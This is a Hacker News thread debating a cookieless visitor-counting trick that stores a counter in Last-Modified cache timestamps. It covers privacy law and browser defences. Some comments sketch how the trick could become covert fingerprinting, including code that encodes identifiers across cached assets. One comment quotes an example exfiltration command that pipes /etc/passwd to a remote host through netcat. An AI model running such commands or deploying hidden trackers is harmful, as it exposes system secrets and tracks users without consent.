| In my experience the stalky behaviour doesn't improve the
| advertising relevance from my PoV, so the fact it means
| that all that derived information, some of it definitely
| PII, is out there so should anyone be able to hack into it
| they could use it for fraudulent purposes (identity theft,
| spear-phishing my contacts, ...), makes the situation lose-
| lose for me.
|
| It is worse for other people, as they have information that
| advertisers like to derive that might be extra sensitive.
| Being white, male, cis, middle-class, etc., with a life not
| interesting enough for there to be much to convincingly
| blackmail or threaten me about, living in western Europe,
| I'm pretty safe, but this can't be said for others
| especially in certain parts of the world (scarily religious
| ruled countries with bad records on individual rights, like
| Qatar and America to give two examples).
| xapata wrote:
| I think you're conflating two different kinds of
| surveillance. The article is incrementing a counter to
| track the number of unique visitors.
|
| If one is worried about blackmail or violence, especially
| from a government, then one should take precautions
| beyond complaining about the prevalence of browser
| cookies. Modern life, carrying a mobile internet device
| with GPS service, using a credit card, and going to
| places with security cameras, presents a variety of
| surveillance methods.
| throwaway0x7E6 wrote:
| we the normal people
| lolinder wrote:
| Counting is not the same as tracking. The technique proposed
| would in most cases be useless for trying to _distinguish_
| individuals, much less identify them. It's the computer
| equivalent of the person standing out in front of Costco with
| a clicker counter.
| MereInterest wrote:
| In principle, screen resolution would in most cases be
| useless for trying to distinguish individuals. After all,
| it wouldn't even distinguish the underlying hardware, let
| alone a user of that hardware. But given omnipresent
| tracking, it's one more bit that can be used to identify
| you.
|
| In addition, your comment shows a severe lack of
| imagination. Suppose I'm a malicious server who wishes to
| track users.
|
| * For each new user, select a random "last-modified" date.
| Now, I can clearly distinguish between multiple different
| users, because "1985-01-01T00:00:10" is probably the 10th
| visit from whoever was given "1985-01-01T00:00:00" on their
| first visit.
|
| * If I have too many users for the above approach to
| uniquely identify a person, add more cached items. With
| HTTP/2, both HTTP requests would use the same TCP
| connection, so I can correlate the requests together.
|
| And, bam. That goes from "useless for trying to distinguish
| individuals, much less identify them" to a unique
| identifier stored in the cache invalidation dates.
| lolinder wrote:
| That is a different technique that uses the same medium
| of storage. When I say "this technique" I'm referring to
| specifically what was discussed in the article.
|
| "Evil tracking companies will do evil things with any
| protocol features you give them" is already well known
| and there's not much to say about it that hasn't been
| said. What OP is _actually_ doing is clever and new to
| me.
| MereInterest wrote:
| I agree that it is clever, and it is new to me as well.
| However, saying that an obvious extension to a technique
| (posted by multiple people independently, no less) is a
| different technique altogether and therefore not germane
| is going a bit far.
|
| If I post a privilege escalation exploit that allows me
| to execute "cat /etc/sudoers", and somebody points out
| that it could also be used to execute "cat /etc/passwd |
| netcat malicious-remote-server.com", that's an obvious
| extension of the same technique. This is the same, where
| the same technique may be used for more intrusive attacks
| than are performed in the initial proof of concept.
| lolinder wrote:
| This kind of attack isn't new, though, trackers have been
| using side channel tracking forever now. A quick search
| shows that this _exact_ side channel tracking
| vulnerability was discussed in the year 2000 [0].
|
| I'm not saying the technique isn't similar: I just object
| to people dogpiling on OP because _other_ people can and
| do abuse the same header in nefarious ways. It's not
| constructive, just a pointless attack on someone who's
| actually trying to improve privacy.
|
| [0] http://www.sourcefrog.net/projects/meantime
| ilyt wrote:
| Kinda need one for the other if you want to distinguish
| different users vs just one user clicking a lot.
|
| You need some kind of identifier to differentiate between
| different sessions, and the moment you generate that ID,
| using whatever way, you are tracking the user.
| bawolff wrote:
| Why would it be useless? Just pick a random date for each
| user.
| lolinder wrote:
| I'm not talking about what you could theoretically do
| with cache headers, I'm talking about what the author of
| the article is actually doing.
| bawolff wrote:
| It's not like that is a far walk though. It's the exact
| same technique, just storing different data.
|
| Respectfully I feel like this would be like seeing an
| example of css turning a page blue and claiming the
| technique is useless for turning the page red because
| that is not the specific example used.
| lolinder wrote:
| If a bunch of people got up in arms and started
| complaining because the author of said CSS example hadn't
| considered that their code could be changed slightly to
| produce a hate symbol, I'd definitely still jump in and
| say "but that's not what they were doing!"
| SkyBelow wrote:
| Counting is not tracking, but counting unique visitors
| requires tracking to know they are unique. If the person
| outside of Costco is counting unique visitors, they must be
| tracking who has already visited and who has not. Even if
| they aren't doing anything else with that information and
| forgetting it each night, it is tracking. The existing
| abuse of tracking has led to a level of backlash where any
| tracking is seen through the worst possible lens.
| jcuenod wrote:
| It doesn't require tracking. Tracking would mean I could
| tell that user x has returned n times. But I have no idea
| who has returned, only that someone has returned n times.
|
| The person standing outside Costco is counting people by
| giving them a colored sticker when they walk through the
| door. If they show up already having one, the counter
| issues a different color. Who has the stickers is
| unknown; only the number of stickers distributed in each
| color is known.
|
| As has been said, this is not to say the technique
| couldn't be used for nefarious purposes. In this case,
| it's not, though.
| SkyBelow wrote:
| That's still a form of tracking. Maybe not enough to
| identify unique users in some use cases, but even just
| knowing someone has been here n times is enough if the
| user numbers are low enough that you can identify users
| by unique n counts and patterns of n (such as if one user
| is at 500 and another is at 490, if the second one is
| logging in daily while the first one hasn't logged in for
| a few months, and you see the 490 go 491, 492... then once
| they go from 499 to 500, chances are that when a 500 logs
| on tomorrow and becomes 501, it was the 490 account that
| has been logging in daily).
| jcuenod wrote:
| Must admit, I've never thought of "number of times I've
| visited your site" as PII. Number of times I've visited
| every site in my browser history, maybe, but not "number
| of times I've visited this specific site". I'm thinking
| about it, but I'm not immediately convinced.
| [deleted]
| layer8 wrote:
| If this becomes widespread, browsers will probably start fudging
| the timestamps.
| glenjamin wrote:
| I think the comments on this post would probably be less hostile if
| the title said something like "detect the number of unique
| visitors", which is what I believe it's doing, rather than
| detecting unique visitors using unique timestamps, which is what
| many seem to be guessing based on the headline alone.
| andix wrote:
| It would be interesting to know whether it can also be abused:
| is it possible to create enough unique timestamps that
| browsers still accept? Can you add milliseconds to the TS,
| and do browsers store them too? Or do browsers also accept
| timestamps from months or years back and re-send them? If you
| can use the whole scale of Unix time (int32), there is a huge
| pool of entropy available.
|
| In this case they don't do this evil thing, and it probably
| would still violate the European GDPR, even if it's not an
| actual cookie, but somebody has to find it first.
| kapep wrote:
| Even without millisecond precision, you could embed multiple
| assets that are served with slightly different timestamps to
| encode a unique identifier.
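|
| A rough sketch of the arithmetic behind this, in Python. It
| assumes each asset's timestamp is confined to a single day
| (86,400 possible second offsets, a bit over 16 bits); the
| function names are made up for illustration and are not from
| the article.
|

```python
SECONDS_PER_DAY = 86_400


def encode(identifier, assets):
    """Split an integer into base-86400 digits, one per cached asset.

    Each digit would be used as a seconds-past-midnight offset in
    that asset's Last-Modified value.
    """
    digits = []
    for _ in range(assets):
        identifier, digit = divmod(identifier, SECONDS_PER_DAY)
        digits.append(digit)
    if identifier:
        raise ValueError("identifier too large for this many assets")
    return digits


def decode(digits):
    """Rebuild the integer from the offsets echoed back by the browser."""
    value = 0
    for digit in reversed(digits):
        value = value * SECONDS_PER_DAY + digit
    return value
```

| With only two assets that is already 86,400^2, about 7.5
| billion distinct values.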
| tedunangst wrote:
| Your personal visit count is embedded in the seconds.
| lisper wrote:
| Yes, but not your identity.
| michaelbuckbee wrote:
| They're using this to track number of unique visits from a
| single user to a site.
| Thorrez wrote:
| Yes, but I think they're not tracking anything else about the
| user besides number of visits. E.g. I don't think they're
| tracking IP.
|
| And I think they are only doing it within a single day, not
| across days.
|
| If you know that someone exists who visited your site 500
| times today, but know nothing else about the person, is that
| a privacy problem?
| rkagerer wrote:
| ...at the cost of caching (or at least a round trip).
|
| Is it necessary to know how many visits per day a particular user
| made? If # of unique visitors per day/week/whatever is
| sufficiently granular you could retain a corresponding cache
| window.
|
| Also if this is to avoid those cookie warnings that got popular
| after GDPR, it should be noted you're still storing information
| on users' computers. i.e. The stuffed metadata is not so
| different in principle from a cookie. In this case it seems
| innocuous, but I wouldn't be surprised to see sites exploit your
| trick to store a unique last-modified date for each user as a
| method of tracking (if that's not already commonplace).
| not2b wrote:
| The number of unique visits in a day is the number of total
| visits minus the number of repeat visits from the same users,
| so they need something like this to get an accurate count. You
| can't produce the number without information on repeat
| visitors.
|
| I think you are right that this technique could be changed and
| turned into a way to track individual users. But as
| implemented, it doesn't do that, and all knowledge is lost
| after one day. We shouldn't criticize people who are trying to
| limit the information they collect to the bare minimum by
| pointing out an altered version of their system might have
| undesirable properties.
| rkagerer wrote:
| Then the server doesn't need to know about repeat-visits that
| don't hit it, and it would be nice to maintain caching
| support if the page content is static.
| irq-1 wrote:
| Change 'last-modified' to use a secure hash of the contents, like
| sha256. Then the browser can detect if a website is giving bad
| hashes, potentially using them for tracking.
| sdfhbdf wrote:
| That's what ETag is for.
|
| https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/ET...
| irq-1 wrote:
| ETags can be anything -- they aren't required to be a hash of
| the content.
|
| Thinking about this problem, why does the browser expose any
| information about what's in the cache? Client-side JavaScript
| can't tell what's in the cache because it's an obvious
| security issue. Why let the server know?
|
| Browsers should ask for the hashes on a list of content
| without exposing their cache contents. Then the browser can
| request anything that's changed.
| jefftk wrote:
| The way If-None-Match works is that the browser says "give me the
| latest if this ETag represents an out-of-date resource,
| otherwise I'll keep using my copy." It's not clear to me
| how you're proposing this work instead?
|
| (Also, in many cases the server uses a hash of the inputs
| to generating the resource, which isn't something
| externally verifiable)
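|
| A minimal sketch of that exchange from the server's side, in
| Python. It assumes a single strong ETag and ignores "*", tag
| lists and weak validators. make_etag and respond are
| hypothetical names; here the tag happens to be a SHA-256 of
| the body, but nothing in the protocol requires or lets the
| client check that.
|

```python
import hashlib


def make_etag(body: bytes) -> str:
    """Build a quoted ETag from the response body (one possible choice)."""
    return '"' + hashlib.sha256(body).hexdigest() + '"'


def respond(body: bytes, if_none_match):
    """Return (status, headers, payload) for a conditional GET.

    if_none_match is the raw If-None-Match header value, or None.
    """
    etag = make_etag(body)
    if if_none_match == etag:
        # The browser's copy is current: send no body.
        return 304, {"ETag": etag}, b""
    # No tag, or a stale one: send the latest version.
    return 200, {"ETag": etag}, body
```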
| jefftk wrote:
| ETag doesn't have any assurance that it's a hash of the page
| contents: the current protocol doesn't stop the server from
| embedding arbitrary information in the ETag, and there's no
| way for the client to tell.
| debugnik wrote:
| Neither does Last-Modified, as we just saw. If we were
| going to alter the meaning of a header for this, it should
| be ETag. Just agree on ETag formats that browsers can
| verify are just hashes, and have them throw away any opaque
| ETags or dates.
| jefftk wrote:
| You'd need to introduce something new for that. Many
| servers compute ETags today as hashes of _inputs_ to a
| process.
|
| (Which is nice computationally, since you can immediately
| say "not modified" instead of building the response,
| hashing it, and throwing it away if the hash matches)
| debugnik wrote:
| Well, I said "just hashes" for short, but such ETag
| formats could agree on other algorithms as well, as long
| as the browser can verify them.
|
| And introducing a new method doesn't solve the issue of
| deprecating the existing abusable methods, which is why I
| suggested one that can already be implemented by privacy-
| first browsers one-sidedly. Servers would then be
| pressured to migrate to some friendly ETag format if they
| don't want to completely lose client-side caching for a
| (hopefully growing) share of their userbase.
| Isinlor wrote:
| This is really no different than a cookie - basically the same
| mechanism from the view of the server just different semantics.
| geocar wrote:
| Well, yes you could have a cookie with C=C+1 and carefully set
| the expiration to the end of the day (like the article), or you
| could use randomly generated last-modified times and
| deduplicate server-side (similar to how cookies are usually
| used), but I can think of a few reasons the cache would give
| greater precision, so even if a lot of the same things are the
| same, I'm not so sure it's really "no different"; these things
| are pretty important to (some) publishers:
|
| - third-party cookie blocking/notification features in browsers
|
| - review processes on ad networks checking for actual cookies
| rather than suspicious last-modified times
| legitster wrote:
| If anything, this is worse.
|
| Cookies have built in browser behavior - they have limited
| scope, the browser lets you see them, they get cleared out
| regularly.
|
| Abusing metadata is way sketchier.
| eurasiantiger wrote:
| Chances are they aren't the first to come up with something
| like this. How can we detect this kind of metadata abuse?
| fanso99 wrote:
| perhaps randomize minutes/seconds of the "last-modified"
| header.
| notpushkin wrote:
| Or perhaps just drop minutes/seconds. And maybe don't
| store the date altogether for files that are small
| enough?
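|
| A sketch of the "drop minutes/seconds" idea as a client might
| apply it before storing the value, in Python. coarsen is a
| hypothetical helper, not an existing browser feature, and it
| assumes the header is a well-formed HTTP date with a timezone.
|

```python
from datetime import timezone
from email.utils import format_datetime, parsedate_to_datetime


def coarsen(last_modified: str) -> str:
    """Round a Last-Modified value down to the start of its hour."""
    stamp = parsedate_to_datetime(last_modified)
    if stamp.tzinfo is None:
        raise ValueError("expected a timezone-aware HTTP date")
    stamp = stamp.astimezone(timezone.utc)
    stamp = stamp.replace(minute=0, second=0, microsecond=0)
    return format_datetime(stamp, usegmt=True)
```

| A counter carried in the seconds field would collapse to the
| same value on every visit.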
| pornel wrote:
| Important to note that privacy laws that regulate tracking are
| not limited to the Cookie header. They apply to tracking and
| data collection in general, regardless of how technically
| clever you make it.
| ape4 wrote:
| Yes, cookies are a header field sent back by the browser and so
| is this.
| pavon wrote:
| Exactly. They could have the same functionality and privacy
| characteristics if they simply kept a cookie that incremented
| each time the site was visited. The fact that they didn't go
| this route suggests this is more about finding a way to track
| unique visitors when cookies are disabled. They are
| deliberately subverting the user's desire to not be tracked and
| spinning it as a privacy win.
| dahfizz wrote:
| If it was about tracking users, wouldn't they generate a
| unique timestamp per visitor on the first visit? Giving
| everyone the same timestamp is a terrible way to try and
| track individuals.
| dvko wrote:
| This is part of why I quit my privacy focused analytics start-
| up years ago. I won't name it directly, but it was one of the
| first and is still going strong (although not really open-
| source anymore).
|
| People kept asking for cookieless tracking but with another way
| of identifying returning visitors that was always worse from a
| privacy standpoint. Cookies can be controlled by the client,
| anything stored on the server can not.
|
| Honestly, cookies are pretty nice, it's the law around this
| that sucks. Tricks that attempt to bypass the laws will surely
| only work for a limited time, at least I hope they will...
| yunruse wrote:
| Hm, on Safari 16.1 it seems reloading twice clears the cache and
| therefore the counter (but eg cmd-W cmd-Z cmd-R will safely
| increase it). Either way, I think I would prefer this behaviour
| to be some sort of cookie that the law okays, because as everyone
| else has said, I'm quite sure browsers will fuzz these data.
|
| (I would probably go for a Gaussian fuzzer each visit, just
| because it adds the off chance that it's quite a way away from
| any attempted ID, making it a little bit more difficult to cast a
| wider net and get a few bits of entropy)
| mikem170 wrote:
| Their demo counter [0] didn't work in my browser, maybe because I
| normally have javascript disabled.
|
| In the demo it seems they have XMLHttpRequest code calling
| ping.withcabin.com/cache for this trick of theirs.
|
| Can this method of counting be made to work without javascript?
|
| [0] https://lastmodified.normally.com/
| zagrebian wrote:
| > Many privacy-focused analytics services will generate and store
| a UID on the server instead of saving it in a cookie - based on a
| hash of your User Agent, IP, Location, Date etc.
|
| What location? The Geolocation API?
|
| What date? How can a date contribute to a UID? Each visitor sends
| multiple HTTP requests at different dates.
| notpushkin wrote:
| If it's anonymous and doesn't collect any user data, why do we
| need it at all? Would using a cookie for the same purpose (just a
| counter of visits, resetting every day) trigger the GDPR laws
| somehow? It would work in literally the same way except being
| transparent to the user instead of utilizing some shady
| technique.
| zzo38computer wrote:
| It should be able to detect that the date is not valid (and that
| their precision is wrong), and avoid sending a "If-Modified-
| Since" header. (The same would be true if they were assigned at
| random rather than sequential like this; it still should be able
| to detect that they are not valid and have wrong precision.)
| [deleted]
| birdmanjeremy wrote:
| The demo doesn't work in safari on my mac. It sometimes gets to
| 2, but on refresh goes back to 1. Actually, got it up to 4 one
| time. Seems like the claims of "Works in any browser and any
| server" are overstated.
| devmunchies wrote:
| same. I got it up to 8 by clicking into the address bar and
| hitting enter. However, doing a refresh instead caused it to
| reset (the browser didn't send the if-modified-since header so
| the server didn't do its little trick and instead started
| over)
| alexmolas wrote:
| What if during a day I visit the website more than 86400 times?
| ;)
| speedgoose wrote:
| > This is great for privacy as we don't need to use cookies, IP
| addresses, fingerprinting or unique identifiers. In our tests,
| this method proved durable enough to be the most reliable method
| of counting unique visitors without using cookies.
|
| The differences with a cookie are that the header is named Last-
| modified instead of Set-Cookie and Cookie, and the value must be
| a datetime in the RFC2616 format.
|
| How is it good for privacy? I think it's worse because it's
| invisible for the user. I would bet tracking visitors using such
| a hack isn't compatible with GDPR, which requires informed
| consent for tracking. And good luck explaining your hack to the
| average visitor.
| Etheryte wrote:
| You seem to slightly misunderstand how GDPR works. Tracking in
| and of itself is not the problem, it's personal data and
| personally identifying data that is. You can count how many
| hits your server receives no problem, this is roughly the same
| idea.
| havkom wrote:
| Basically the "cookie consent" part in the EU stems from the
| e-privacy directive. Article 5.3 refers to GDPR (through the
| directive that is replaced by GDPR) and reads:
|
| Member States shall ensure that the storing of information,
| or the gaining of access to information already stored, in
| the terminal equipment of a subscriber or user is only
| allowed on condition that the subscriber or user concerned
| has given his or her consent, having been provided with clear
| and comprehensive information, in accordance with Directive
| 95/46/EC, inter alia, about the purposes of the processing.
| This shall not prevent any technical storage or access for
| the sole purpose of carrying out the transmission of a
| communication over an electronic communications network, or
| as strictly necessary in order for the provider of an
| information society service explicitly requested by the
| subscriber or user to provide the service.
|
| In short, this method may fall under the EU "cookie law"
| above. The use of timestamps may require consent if they are
| used to distinguish users (even if only for counting
| purposes). The timestamps may then also be personal data
| under the GDPR.
| luckylion wrote:
| This is equivalent to setting a cookie with a hit count. It's
| still storing & submitting information, it's just not using a
| unique identifier (Which is pretty privacy-respecting, I'm
| not saying it's a terrible thing or something).
|
| I assume it will be treated as such, too. If you can use a
| cookie to do this without consent, this is fine too. If you
| can't then it's not. The same happens for local/session
| storage: it's cookie-equivalent.
| xyproto wrote:
| The user with the highest visit count will always be
| uniquely identifiable, though.
| not2b wrote:
| Only on the same day. Everything is reset the next day.
| jiveturkey wrote:
| I don't follow how this is a problem.
|
| By that measure, any users behind a unique single IP (no
| IP pooling, no CGNAT, etc) will always be uniquely
| identifiable. And for IP there are far fewer steps to
| personally identify the user. The server necessarily sees
| the user IP.
| speedgoose wrote:
| Yes, the IP can be used to identify people. If you want
| to track users using their IP and respect GDPR, you need
| to get their consent first.
|
| The best is to not store them before you get consent.
| Having a temporary access log with a few IPs is probably
| fine. But keeping all your access logs forever for
| analytics purposes is not fine anymore.
| speedgoose wrote:
| I will quote the law:
|
| > Natural persons may be associated with online identifiers
| provided by their devices, applications, tools and protocols,
| such as internet protocol addresses, cookie identifiers or
| other identifiers such as radio frequency identification
| tags. This may leave traces which, in particular when
| combined with unique identifiers and other information
| received by the servers, may be used to create profiles of
| the natural persons and identify them.
| jakobdabo wrote:
| ETag (paired with If-None-Match header sent by the browsers) is
| another caching header to be aware of.
|
| https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/ET...
| doomrobo wrote:
| Ooh that's kinda evil. A server could give a client a uniquely
| identifying ETag for a given URL. So whenever the client comes
| back on the same browser, they're identified.
|
| Fortunately this is probably just as detectable as the Last-
| Modified abuse in the post.
| bawolff wrote:
| There are a lot of things like that. Although browsers
| changed it recently, you also used to be able to use TLS
| session tickets.
|
| Another one was the favicon cache.
|
| Pretty much any state on the browser can be used to track
| people.
| mulhoon wrote:
| Hi, author of the article here.
|
| Just to give a little more background here.
|
| Cabin doesn't store a row in a database for each visit. It only
| stores one row, per day per domain. The attributes for that row
| are simple tally counts - visits, uniques, bounces etc. So no
| identifier is stored, and the hits go into the tally. We do not
| store the fact that a user has visited x amount of times. The
| demo here is to show how the technique works.
|
| Cabin used to detect only the presence of _any_ last-modified
| date to determine if the visit is unique or not. But extending it
| to distinguish hits 1,2 and 3 (by adding 1 second to the start of
| the day) now allows us to count the bounce rates too.
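|
| A minimal sketch of how such a scheme could work, in Python;
| this is not Cabin's actual code. It assumes the first response
| of the day carries midnight UTC as Last-Modified and each
| later one adds a second. The bounce handling is a guess, and
| handle_ping and update_tally are hypothetical names.
|

```python
from datetime import datetime, timedelta, timezone
from email.utils import format_datetime, parsedate_to_datetime


def handle_ping(if_modified_since, now):
    """Return (visit_number, last_modified) for one request.

    if_modified_since is the raw header value or None; now must be
    a timezone-aware UTC datetime.
    """
    midnight = now.replace(hour=0, minute=0, second=0, microsecond=0)
    visit = 1
    if if_modified_since:
        try:
            seen = parsedate_to_datetime(if_modified_since)
        except (TypeError, ValueError):
            seen = None  # unparseable header: treat as a first visit
        # Only timestamps from today count; older ones start over.
        if seen is not None and seen.tzinfo is not None and seen >= midnight:
            visit = int((seen - midnight).total_seconds()) + 2
    stamp = midnight + timedelta(seconds=visit - 1)
    return visit, format_datetime(stamp, usegmt=True)


def update_tally(tally, visit):
    """Update the single per-day, per-domain row of counts."""
    tally["visits"] += 1
    if visit == 1:
        tally["uniques"] += 1
        tally["bounces"] += 1  # assumed: a lone hit counts as a bounce
    elif visit == 2:
        tally["bounces"] -= 1  # assumed: a second hit cancels it
```

| Nothing per-visitor is kept on the server in this sketch; the
| only state is the timestamp in the browser's cache and the
| three tally counts.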
| ohbtvz wrote:
| Have lawyers familiar with EU law vetted your technique? Could
| you share their legal reasoning? If not, why would anyone ever
| take the risk to use your product and face huge fines?
| senko wrote:
| (Not OP)
|
| I am all for privacy, use uBO, Firefox Focus / Incognito and
| Google alternatives. But if I have to consult a lawyer each
| time I write some code or write up a blog post, I'll take up
| gardening instead.
| jefftk wrote:
| The OP is a "privacy-first web analytics" company; this is
| totally something they should be asking their lawyers.
|
| Note that they list the GDPR on their "Privacy law
| compliance" page (https://docs.withcabin.com/privacy.html)
| but not ePrivacy...
| ohbtvz wrote:
| No need for this kind of hyperbole. I wouldn't ask this
| question if the OP's post didn't contain grandiose claims
| such as "No cookies, no consent banners, no ad networks,
| 100% GDPR & CCPA compliant, low footprint web analytics."
| OP made a claim about their compliance with EU law. I'm
| asking for proof or at least an explanation.
| rcoveson wrote:
| How about just consulting a lawyer each time you abuse a
| protocol to get user's software to behave in a way that is
| invisible to them and benefits you?
|
| There is already a correct way to tell a browser to tell
| the server something with each subsequent request: Cookies.
| Nobody needs to "write some code" here; it's already
| written. Working around the protocol isn't engineering,
| it's just lying.
|
| This blog post is just another cynical degradation of trust
| between users and their browsers, and browsers and the
| servers they talk to. Just another part of HTTP that we
| can't use for what it was designed for anymore because
| servers want so desperately to track visitors uniquely and
| a significant subset of visitors would prefer not to be
| remembered uniquely.
| jefftk wrote:
| Your landing page says "no cookies or consent banners" and
| "compliant with all privacy laws", but the timestamp approach
| stores data on a user's computer in a way that is not "strictly
| necessary in order to provide an information society service
| explicitly requested by the subscriber or user". Could you
| explain how you see your approach as compliant with the
| ePrivacy directive?
|
| Full text: https://eur-lex.europa.eu/legal-
| content/EN/TXT/HTML/?uri=CEL...
|
| Guidance:
| https://ec.europa.eu/justice/article-29/documentation/opinio...
| IshKebab wrote:
| Yeah this is just a cookie by another name. Probably already
| used by supercookies.
|
| The GDPR doesn't single out cookies so you can't get around
| it by using a different storage device.
| jefftk wrote:
| _> The GDPR doesn't single out cookies so you can't get
| around it by using a different storage device._
|
| Quibble: this isn't a GDPR issue, it's an ePrivacy issue.
| Two different regulations.
| lolinder wrote:
| Thanks for sharing!
|
| I personally don't have an issue with it, but one thing that
| might set some of the people here at ease is if you stopped
| incrementing the timestamp after the second visit.
|
| This would give you three possible states anyone could be in:
| never visited, visited once, and visited more than once. It's
| less data, but still enough to give you your bounce rate _and_
| your total visits while minimizing the number of boxes you're
| sorting individual visitors into.
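|
| Roughly what that cap could look like, in Python. This is a
| sketch under the assumption that the counter is a number of
| seconds past midnight echoed back by the browser; next_offset
| and classify are hypothetical names.
|

```python
from typing import Optional


def next_offset(previous: Optional[int]) -> int:
    """Seconds past midnight to send back in Last-Modified.

    previous is the offset the browser echoed in If-Modified-Since,
    or None when no header arrived (first visit of the day).
    """
    if previous is None:
        return 0  # browser now holds "visited once"
    return 1      # browser holds "visited more than once"; never grows


def classify(previous: Optional[int]) -> str:
    """Name the state the server can infer from the echoed offset."""
    if previous is None:
        return "first visit"   # counts as a unique visitor
    if previous == 0:
        return "second visit"  # no longer a bounce
    return "repeat visit"      # nothing finer is recorded
```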
| josephscott wrote:
| This reminded me of something I haven't thought about in a while:
| evercookie - https://github.com/samyk/evercookie
| [deleted]
| tobr wrote:
| That's pretty clever. I think if you really want to keep it
| privacy respecting, you should stop counting at 1 - so you can
| distinguish the first vs subsequent visits, but you can't tell if
| someone has visited 2 or 200 times.
| AkshatJ27 wrote:
| what is the problem with letting a website know how many times
| I have visited the page? How is it better for a website to only
| know if I have visited earlier or not?
| xyproto wrote:
| Many clients may have visited only one time, but when you
| reach higher numbers they may be used together with other
| data to help identify users.
|
| Maybe only one user will have over 100 visits, and then you
| can uniquely identify them.
| barefeg wrote:
| Makes sense. I'm not very experienced in privacy but could
| you explain why uniquely identifying the user is a problem?
| As in you can tell that there's one user who visited 100
| times but how can you use that information to correlate
| with an identity?
| _justinfunk wrote:
| This is also my question that all the people wearing
| their smart lawyer hats seem to be claiming but not
| explaining.
| WirelessGigabit wrote:
| Every subsequent visit they bump up the number.
| cortesoft wrote:
| I am having trouble understanding how knowing someone has
| visited three times is more privacy invasive than knowing they
| visited twice. What is so magical about 3?
| tobr wrote:
| Consider that there's some long tail of visitors who visit
| many times in one day. Someone is going to be visiting more
| times than anyone else, whether that's 10 or 100 or 1000 page
| views. That person is now uniquely trackable. To avoid that
| situation you need to stop counting somewhere, and you're not
| really getting any new info after 1 (well, 2 I suppose, if
| you want to track bounces), so you might as well stop there.
| dahfizz wrote:
| I don't agree that the existence of this header makes a
| user more trackable. You can already uniquely identify
| visitors with their IP & source port, which is included in
| every single packet and is way more specific than some
| timestamp.
|
| Your argument seems to be that this timestamp in the header
| could possibly be used as a lookup key in a database of
| visitors. I think that's a stretch, but in any case that
| database would be the privacy violating thing. This header
| is completely anonymous.
| tobr wrote:
| You're probably right! But since they aren't getting any
| more info by continuing to count after 2, it's just a
| liability to do it. After all, the whole point of the
| setup seems to be to minimize the amount of unique
| information the system has to process.
| o_m wrote:
| Counting to two is needed to handle the bounce rate.
| kube-system wrote:
| 3 is magical in that it comes after 2.
|
| If 100 people visited once, and one person visited twice...
| then a new request with visitCount=3 is that second person.
| Jabdoa2 wrote:
| I guess according to GDPR this counts as tracking nonetheless.
| GDPR does not specifically mention cookies or anything technical.
| An identifier is enough (does not have to be a uuid). IP,
| location, browser etc already counts. This probably would count
| as storing something like a cookie on the client.
| WirelessGigabit wrote:
| I wonder how this works with systems like Akamai which by default
| mess with those headers.
| DueDilligence wrote:
| .. and we're fast on-track of a webkit extension to block this
| BS.
| cactacea wrote:
| Why block it entirely when you can just feed them garbage data?
| cpeterso wrote:
| Sending a garbage Last-Modified time might confuse the server
| and cause unpredictable problems for the user. Blocking it is
| safe because the server will just assume this is the first
| time the user has visited the website.
| enkrs wrote:
| What's the motivation to block/misinform?
|
| This allows site owners to get statistics on page
| views/uniques/bounces without unique identifier cookies or
| javascript injections.
|
| I'm all for blocking any abusive tracking methods, but this
| looks to me like creative website statistics that works for
| single domain. What's the harm by measuring that?
| michaelt wrote:
| While this _particular_ implementation doesn't track
| individuals, couldn't you trivially start tracking
| individuals by sending them unique random times like
| _last-modified: 12 Mar 1978 12:34:56 GMT_, thereby giving them a
| ~30 bit unique identifier for as long as the file is
| cached?
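A rough check of the "~30 bit" figure, assuming one-second resolution and that any timestamp between the 1978 example date and the time of this thread is usable. Both endpoints are assumptions picked for illustration.

```python
import math
from datetime import datetime, timezone

# Assumed range: the example date from the comment up to the thread's date.
earliest = datetime(1978, 3, 12, 12, 34, 56, tzinfo=timezone.utc)
latest = datetime(2022, 11, 30, 16, 4, 0, tzinfo=timezone.utc)

# Each whole second in the range is one distinct Last-Modified value.
distinct_values = int((latest - earliest).total_seconds())
bits = math.log2(distinct_values)

print(f"{distinct_values} distinct timestamps, about {bits:.1f} bits")
```

Under those assumptions the range holds a bit over a billion distinct values, which lands between 30 and 31 bits, consistent with the estimate in the comment.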
| pwdisswordfish0 wrote:
| Only if you disregard the amount of latitude that the
| semantics of these headers give to UAs that would
| effectively thwart this method of tracking.
|
| If I fetch your /foo.html today in November 2022, and you
| send me a last-modified from 1978, that gives me and my
| UA a huge range from which to select a different datetime
| (anywhere between the 1978 value and now-ish) on my next
| request. How are you going to correlate my original and
| subsequent requests if in the latter I ask if you've got
| a copy that's been modified since 1999?
| marshray wrote:
| Sure, a UA _could_ do a whole lot of things to resist
| fingerprinting.
|
| But users go to the web with the browser they've been
| given.
|
| Apple, famously, forbids its users to speak HTTP with
| anything else on iOS.
| nkrisc wrote:
| > What's the motivation to block/misinform?
|
| What's the motivation to submit to it?
| yojo wrote:
| Allowing websites to get a somewhat accurate count of
| visitors plus bounce rate helps them to tell how they're
| doing. Hopefully, they use that to guide developing a
| better product/service.
|
| If you can allow them to do that without getting tracked,
| it's win-win. You get a better experience when they build
| a better service.
| yojo wrote:
| To be clear, they're not generating _unique_ headers. They're
| setting them to the day start, so they can tell if the
| requester has already been to the site today or not. It
| actually seems pretty reasonable.
| pavon wrote:
| The way they are using it is providing less information than
| a UID cookie would, but the same amount of information as a
| boolean "previously visited" cookie. However, now that the
| technique is known there is nothing stopping people from
| using the same method to store a UID date, and privacy
| protecting clients will have difficulty differentiating
| between the two, so best to eliminate this as a
| fingerprinting method altogether.
| not2b wrote:
| People keep saying in this thread "there is nothing
| stopping people from using the same method" to do something
| else! I think that this is an irrelevant criticism. This is
| a valid attempt to minimize the amount of information
| collected on visitors and still providing a unique visitors
| per day count, and the fact that someone could build a
| similar but different system that looks like a cookie isn't
| relevant.
| pavon wrote:
| They demonstrated a PoC that uses an HTTP feature in a
| way it wasn't intended to add entropy to fingerprinting
| techniques. Discussing how this same exploit could be
| used maliciously by others and how to prevent that isn't
| criticism of the PoC, it is standard security practice.
| chipsa wrote:
| But you can't have as many bits in a UID date as for a
| generic cookie, and a privacy protecting client could just
| ignore the ones that don't make sense. Does a 1978 date
| make sense? Probably not. You could scale this up to the
| millions, probably, but it won't scale infinitely.
| genewitch wrote:
| roblox has ~50mm daily users (DAU), and if my math is
| correct (it probably isn't) you could have hour
| granularity (only 0-23) timestamps on 6 files, each day,
| and track 191mm unique users. I used roblox because i
| knew their DAU off-the-cuff - because roblox requires a
| login, they know who you are anyhow.
|
| But if you do 1 second granularity a mere 2 cache
| timestamps are enough to fingerprint everyone on the
